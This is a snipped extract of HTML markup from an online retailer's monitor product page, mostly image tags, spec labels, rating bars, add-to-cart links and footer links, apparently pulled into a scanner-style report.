<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Speakers:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Contrast Ratio:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Dynamic Contrast Ratio:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Brightness:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Response Time:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Horizontal Viewing Angle:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Vertical Viewing Angle:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
VESA Mounting Compliant:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Dimensions With Stand:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Unit Weight:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Power Consumption:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td valign="top" class="font_size3"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="100%" height="10"><span class="font_size4bold">
...[SNIP]...
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call01-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call02-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call03-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call04-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call05-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call06-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call07-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call08-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call09-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call10-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call11-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call12-jfwd.jpg"></p>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td width="48%"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="20"><span class="ReviewMainHeading">
...[SNIP]...
<span class="ReviewMainHeadingBottom">
                               Customer Rating:.
                                   <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star9.gif">
                               .
                                   4.1<br>
...[SNIP]...
<br><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="100"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="25"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="100"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="25"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="88"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="37"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6532393&csid=ITD&body=REVIEWS&ReviewMode=1#WriteReview"><img src="http://images.highspeedbackbone.net/item-details/Button1_WriteReview.gif" border="0"></a>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="1" vspace="10"><br>
...[SNIP]...
<span class="ReviewCustomerRating">Customer Rating:.
                                                       <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star8.gif">.
                                                       4.0<img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="96%" height="1" vspace="10"></span>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="75"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="50"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="75"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="50"></td>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="1" vspace="15"><br>
...[SNIP]...
<span class="ReviewCustomerRating">Customer Rating:.
                                                       <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star9.gif">.
                                                       4.3<img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="96%" height="1" vspace="10"></span>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="75"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="50"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="100"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="25"></td>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="1" vspace="15"><br>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<h3 id="productresources"><img src="http://images.highspeedbackbone.net/itemDetails/techspedia/techspediaTLCa.jpg" width="620" height="40"></h3>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<li><a href="http://static.highspeedbackbone.net/html/guide_dual_monitors.html" target="_new">Technology Guide: Dual Monitors</a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2" vspace="2"></td>
...[SNIP]...
<a href="/applications/category/category_slc.asp?CatId=41&" target="_blank">

<img src="http://images.highspeedbackbone.net/itemDetails/tech/bluecleaner2.jpg" alt="LCD Monitor & TV Cleaning Tips" border="0" height="94" width="88"></a>
...[SNIP]...
<a href="index.html" target="_top">

<img src="http://images.highspeedbackbone.net/itemDetails/tech/techtip.jpg" alt="Technology Knowledge, Information, and Resources: Technology News, Information Articles, Product Manuals, How To Guides, Brochures and Fact Sheets, Computer Glossary, and Technical Encyclopedia" border="0" height="25" width="82"></a>
...[SNIP]...
<p><img src="http://images.highspeedbackbone.net/itemDetails/bundleline.jpg" width="440"></p>
...[SNIP]...
<a name="dualmonitors">
<img border="0" src="http://images.highspeedbackbone.net/itemDetails/tech/dualmonitors88.jpg" ></a>
...[SNIP]...
<p><img src="http://images.highspeedbackbone.net/itemDetails/bundleline.jpg" width="440"></p>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="12"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="12"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<a id="itemdets_submit_img" href="javascript:addToiCart(6532393,document.getElementById('q_6532393').value,'ITD');"><img src="http://images.highspeedbackbone.net/item-details/addtocart.jpg" border="0"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2" vspace="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
</font><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="10"><br>
...[SNIP]...
<td valign="center" align="left"><img src="http://images.highspeedbackbone.net/refresh.gif" onclick="parent.frames['CaptchaFrame'].window.location.reload();" style="cursor: pointer; cursor: hand;"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<a href="#" onclick="window.open('/sectors/help/TigerLiveAssistance.asp','livehelp','width=640, height=580, scrollbars=yes')"><img src="http://images.highspeedbackbone.net/rightnav/liveHelpIcon160.jpg" border="0" style="margin:0px auto;"></a>
...[SNIP]...
<td width="36"><img src="http://images.highspeedbackbone.net/homepage/ups_logo.gif" width="36" height="41"></td>
...[SNIP]...
<td width="25"><img src="http://images.highspeedbackbone.net/homepage/help_icon.gif" width="25" height="25"></td>
...[SNIP]...
<td height="5"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4494089&csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/S123-2002-main01-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4494089,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6074882&csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/S123-2020-main-or.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6074882,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6680906&csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/E145-0452-Main-01-JH.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6680906,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6321551&csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40889-main01-mc.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6321551,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6321954&csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/P16-40922-mainx-hm.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6321954,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6321953&csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/P16-40921-mainx-ac.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6321953,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4558907&csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40512-Main-sp.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4558907,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4558909&csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40513_main_image001_im.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4558909,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=3948472&csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/ULT40289_main_image001_im.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(3948472,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4558928&csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40521-Main-sp.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4558928,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=6764253&sku=B56-1006&cm_sp=Footer-_-Spot%2001-_-CatId__B56-1006"><img src="http://images.highspeedbackbone.net/dealday/footer_B56-1006.jpg" alt="H&R Block At Home <BR>Deluxe 10 Software" border="0" title="H&R Block At Home Deluxe 10 Software- Personalized Tax Guidance With Advanced Tools"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=6764253&sku=B56-1006&cm_sp=Footer-_-Spot%2001-_-CatId__B56-1006" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=2795126&sku=TSD-500AAKS&cm_sp=Footer-_-Spot%2002-_-CatId_8_TSD-500AAKS"><img src="http://images.highspeedbackbone.net/dealday/footer_TSD-500AAKS.jpg" alt="Western Digital Caviar Blue 500GB Hard Drive" border="0" title="Western Digital WD5000AAKS Caviar Blue Hard Drive - 500GB, 7200rpm, 16MB, SATA-300, OEM"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=2795126&sku=TSD-500AAKS&cm_sp=Footer-_-Spot%2002-_-CatId_8_TSD-500AAKS" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=5650958&sku=D700-5052&cm_sp=Footer-_-Spot%2003-_-CatId_35_D700-5052"><img src="http://images.highspeedbackbone.net/dealday/footer_D700-5052.jpg" alt="D-Link Wireless-N 150 Home Router" border="0" title="D-Link DIR-601 Wireless-N 150 Home Router - IEEE 802.11n, 4x 10/100 LAN Ports, 10/100 WAN Port, External Antenna"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=5650958&sku=D700-5052&cm_sp=Footer-_-Spot%2003-_-CatId_35_D700-5052" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4662424&sku=D29-1026&cm_sp=Footer-_-Spot%2004-_-CatId_379_D29-1026"><img src="http://images.highspeedbackbone.net/dealday/footer_D29-1026.jpg" alt="Dane-Elec 8GB Capless <br>USB Flash Drive" border="0" title="Dane-Elec DA-ZMP-08G-CA-N4-R Capless USB Flash Drive - 8GB"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4662424&sku=D29-1026&cm_sp=Footer-_-Spot%2004-_-CatId_379_D29-1026" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=18657&sku=H450-8216&cm_sp=Footer-_-Spot%2005-_-CatId_136_H450-8216"><img src="http://images.highspeedbackbone.net/dealday/footer_H450-8216.jpg" alt="Hitachi 250GB Mobile Hard Drive" border="0" title="Hitachi 0S02528 Mobile External Hard Drive - 250GB, USB 2.0, Black"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=18657&sku=H450-8216&cm_sp=Footer-_-Spot%2005-_-CatId_136_H450-8216" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="javascript:loadPage('browser', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/favorites2.gif" alt="Add to Favorites"></a>
               <a href="javascript:loadPage('del.icio.us', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/delicious.gif" alt="Add to del.icio.us"></a>
               <a href="javascript:loadPage('digg', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/digg.gif" alt="Add to Digg"></a>
               <a href="javascript:loadPage('reddit', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/reddit.gif" alt="Add to Reddit"></a>
               <a href="javascript:loadPage('furl', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/furl.gif" alt="Add to Furl"></a>
               <a href="javascript:loadPage('stumbleupon', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/su.gif" alt="Add to StumbleUpon"></a>
               <a href="javascript:loadPage('facebook', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/facebook.gif" alt="Add to Facebook"></a>
               <a href="javascript:loadPage('technorati', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/technorati.gif" alt="Add to Technorati"></a>
               <a href="javascript:loadPage('google', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/google.gif" alt="Add to Google"></a>
               <a href="javascript:loadPage('netscape', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/netscape.gif" alt="Add to Netscape"></a>
               <a href="javascript:loadPage('spurl', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/spurl.gif" alt="Add to Spurl"></a>
               <a href="javascript:loadPage('slashdot', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/slashdot.gif" alt="Add to Slashdot"></a>
...[SNIP]...
<div style="width:187px; height:44px; float:left; text-align:left; background:url(http://images.highspeedbackbone.net/footerus/social/footer_social_tiger_twitter2.jpg) top left no-repeat;"><a href="http://www.twitter.com/tigerdirect" target="_blank" style="width:155px; height:44px; display:block;"></a>
...[SNIP]...
<div style="width:187px; height:44px; float:left; text-align:left; background:url(http://images.highspeedbackbone.net/footerus/social/footer_social_tiger_facebook2.jpg) top left no-repeat;"><a href="http://www.facebook.com/tigerdirect" target="_blank" style="width:155px; height:44px; display:block;"></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/showme.asp" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/phone.gif" style="float: left; padding-right: 2px;"></a>
...[SNIP]...
<br /><a href="http://tigerdirect.iapplicants.com" target="_blank">Employment</a>
...[SNIP]...
<a href="http://www.tigerdirect.com/rss/index.asp">Deal Alerts via <img src="http://images.highspeedbackbone.net/main/icon_rss.gif" border="0"></a>
...[SNIP]...
<a href="http://www.tigerdirect.com"><img src="http://images.highspeedbackbone.net/footer/country_icons_18.gif" alt="TigerDirect.com" width="34" height="27" border="0" /></a><a href="http://www.tigerdirect.ca"><img src="http://images.highspeedbackbone.net/footer/country_icons_19.gif" alt="TigerDirect Canada" width="33" height="27" border="0" /></a><a href="http://www.misco.co.uk"><img src="http://images.highspeedbackbone.net/footer/country_icons_20.gif" alt="Misco UK" width="34" height="27" border="0" /></a><a href="http://www.misco.ie"><img src="http://images.highspeedbackbone.net/footer/country_icons_21.gif" alt="Ireland Misco" width="36" height="27" border="0" /></a><a href="http://www.misco.de"><img src="http://images.highspeedbackbone.net/footer/country_icons_22.gif" alt="Misco Germany Inc." width="35" height="27" border="0" /></a><a href="http://www.misco.at"><img src="http://images.highspeedbackbone.net/footer/country_icons_23.gif" alt="Misco Austria " width="33" height="27" border="0" /></a><a href="http://www.misco.ch"><img src="http://images.highspeedbackbone.net/footer/country_icons_24.gif" alt="Misco Switzerland" width="35" height="27" border="0" /></a><a href="http://www.misco.it"><img 